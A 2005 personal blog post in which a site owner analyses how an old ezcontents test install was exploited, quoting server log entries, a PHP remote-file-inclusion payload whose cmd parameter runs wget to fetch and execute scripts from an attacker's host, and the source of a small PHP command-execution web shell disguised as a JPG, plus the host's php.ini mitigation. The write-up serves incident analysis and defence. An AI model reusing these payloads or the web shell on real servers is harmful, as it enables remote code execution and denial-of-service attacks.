More details on php exploit from last week



Ok. I have a bit of time that I can sit down and get a little more detailed on what specifically happened late last week that shut the site down for a couple days.

At one point, I had updated the ezcontents script for the main site (averyjparker.com), but I had left (for about 2 years) a testbed install (at averyjparker.com/ncgen2) trying to setup a platform for an upgrade for the old Genealogy site (www.averyjparker.com/ncgen, new site is now at www.northcarolinagenealogy.net (linked at the top of the page.)) OK, so in searching through the logs here are some of the entries that caught my attention.

63.85.41.229 – - [14/Jul/2005:13:30:31 -0600] “POST /cgi-bin/cgiemail/forms/order.txt HTTP/1.1″ 403 319 “http://www.averyjparker.com/” “-”
200.174.133.132 – - [14/Jul/2005:13:11:59 -0600] “GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg
?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl
%20dos.pl HTTP/1.1″ 200 1032 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)”
200.174.133.132 – - [14/Jul/2005:13:12:01 -0600] “GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg
?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl
%20dos.pl HTTP/1.1″ 200 1032 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)”
200.174.133.132 – - [14/Jul/2005:13:12:01 -0600] “GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg
?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl
%20dos.pl HTTP/1.1″ 200 1032 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)”
200.174.133.132 – - [14/Jul/2005:13:12:19 -0600] “GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg
?&cmd=cd%20/tmp%20;%20wget%20%20http://www.caniggiamatador.com/xpl/pdr%20;
%20chmod%20777%20pdr;%20./pdr HTTP/1.1″ 200 1072 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)”
200.174.133.132 – - [14/Jul/2005:13:09:42 -0600] “GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?
&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl
%20dos.pl HTTP/1.1″ 200 1032 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)”
200.174.133.132 – - [14/Jul/2005:13:09:21 -0600] “GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg
?&cmd=wget HTTP/1.1″ 200 1120 “-” “Mozilla/4.0 (compatible; MSIE6.0; Windows NT 5.0)”

I guess I should preface this, by a simple fact. There are a LOT of exploit attempts that show up in webserver logs. Here’s a sample of one…
211.75.91.2 – - [14/Jul/2005:13:30:24 -0600] “POST /cgi-bin/mailform.pl HTTP/1.0″ 404 290 “http://www.averyjparker.com/” “-”

The first entry is the ip address, then the datestamp, then the specific query *(usually starting with Post or Get, and ending with the version of the protocol.) Next you see 404, that’s the result code and a 404 code means that this file wasn’t found.

What troubled me with the suspicious entries is that the result code was 200 (file found) and it was trying to pass various different bits of information to a php file (/ncgen2//include/db.php) which did exist.

In fact, this bit
?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget
%20http://www.caniggiamatador.com/dos.pl%20;%20perl%20dos.pl
made it look like they were trying to load this file from caniggiamatador.com. I looked at the source of lila.jpg (not a real image file by the way.) It’s basically an html file wrapped around this…
< ?
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp”);
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(“>”, “>”, str_replace(“< ", "<", $output));
?>
ok, so they’re trying to inject this file http://www.caniggiamatador.com/dos.pl and http://www.caniggiamatador.com/perldos.pl

I looked at the code there and they were basically bash scripts that setup a denial of service attack on a specified target. Fairly clever and commented in Portuguese or Spanish. I’ve actually spent some time studying spanish, but there was a lot that was either mispelled, or I simply didn’t understand.

The site is down now by the way. It was hosted by http://www.internetters.net/ it looks like and my service provider dealt with contacting them I suspect.

Since I’m a fairly curious person…. I was also interested in the ip address that was originating the requests 200.174.133.132 An IP whois lookup turned up this…

200.174.133.132 = [ 200-174-133-132-tau.cpe.vivax.com.br ]

I’m guessing a dialup? customer in Brazil (which might back up that the comments were in Portuguese).

I, of course, sent what I found to my service provider. They thanked me for the time I’d spent researching the issue and verified that was the file they were exploiting and that it was a DOS attack against their nameservers. They also sent along a couple of notes on changes to the php.ini that they made to blunt the attack.

disabled_functions: system, cmd, shell_exec, passthru, popen

These were stated to hopefully prevent a future breach by the same method.

Some details of the exploit can be found here.
ezcontents code injection vulnerability

So, how did the find my site to attack. Who knows for certain, but I do have some ideas. I plan to detail those in an upcoming post.

Related Posts

Blog Traffic Exchange Related Posts
  • Microsoft Outlook - duplicate email messages Part II This is part II, click here for part one of the saga... Okay, so I revisit to install Microsoft Office 2003 SP2 and hope that solves it. Somewhere along this time, I had also found a suggestion of removing the entire mail PROFILE and creating a new one. *(The theory......
  • Hexblog (WMF unofficial patch) back up Yesterday the hexblog, which is the site of the person that wrote the unofficial patch for the WMF exploit, was offline for bandwidth over use. Several mirror sites popped up to host the patch. Today the site is back up at http://www.hexblog.com/ in a more minimal form. It's suggested if......
  • The 2nd journey begins… Mandriva 2006 upgrade 2 - Part 8 Ok - tv card - no name brand is now working... it was a bttv compatible card but it's always been "strange" for lack of a better word. NOTHING under linux has seemed to correctly detect it. Sometimes I have seen it given the following settings... bttv card=72 tuner=2, but......
Blog Traffic Exchange Related Websites
  • Keen Keen, Your Personal Advisor, is where you get live, immediate advice for your everyday life. Need advice? Information? Or simply someone friendly to talk to? Keen helps you find the right person and then connects you privately over the phone for a per-minute rate. // < ![CDATA[ google_ad_client =......
  • Badger Pass Ski Resort, Yosemite National Park, CA Badger Pass Ski Resort is located in: Yosemite National Park, CA Phone: (801) 559-4884 Website: http://www.yosemitepark.com/BadgerPass.aspx About the Resort: If you are planning to stay in the Yosemite area or you are just looking for a great way to spend the weekend, Badger Pass Ski Resort is definitely a place......
  • Alameda Marina Alameda Marina is located in Alameda, CA Phone Number: 510.521.1133 Website: http://www.alamedamarina.net/ Email: info@alamedamarina.net Marina Features 530 Wet Berths Pricing for Standard Berths: BOAT LENGTH (LOA)PRICE PER FOOT 22' - 24' $6.50 28' - 32' $7.50 36' - 45 '$8.00 50' Plus $9.00 End Ties & Side Ties $9.00 Covered......
en.pdf24.org    Send article as PDF   

Similar Posts


See what happened this day in history from either BBC Wikipedia
Search:
Keywords:
Amazon Logo

Comments are closed.


Switch to our mobile site